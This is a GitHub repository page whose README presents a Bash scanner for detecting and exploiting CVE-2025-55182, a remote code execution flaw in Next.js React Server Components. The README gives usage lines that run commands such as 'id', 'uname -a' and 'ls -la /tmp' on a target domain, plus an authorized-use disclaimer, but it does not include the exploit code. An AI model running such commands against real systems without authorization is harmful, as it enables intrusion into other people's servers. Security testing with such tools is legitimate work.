Skip to content

zack0x01/CVE-2025-55182-advanced-scanner-

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2025-55182 Scanner

Simple command-line tool for detecting and exploiting CVE-2025-55182 (React Server Components RCE) in Next.js applications. scanner

Installation

chmod +x scanner.sh

Usage

# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

Options

  • -d, --domain - Target domain/URL (required)
  • -c, --command - Command to execute (default: id)

Examples

# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

Requirements

  • Bash
  • curl
  • openssl

Disclaimer

This tool is for educational and authorized security testing purposes only. Do not use against systems you don't own or have permission to test.

References

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages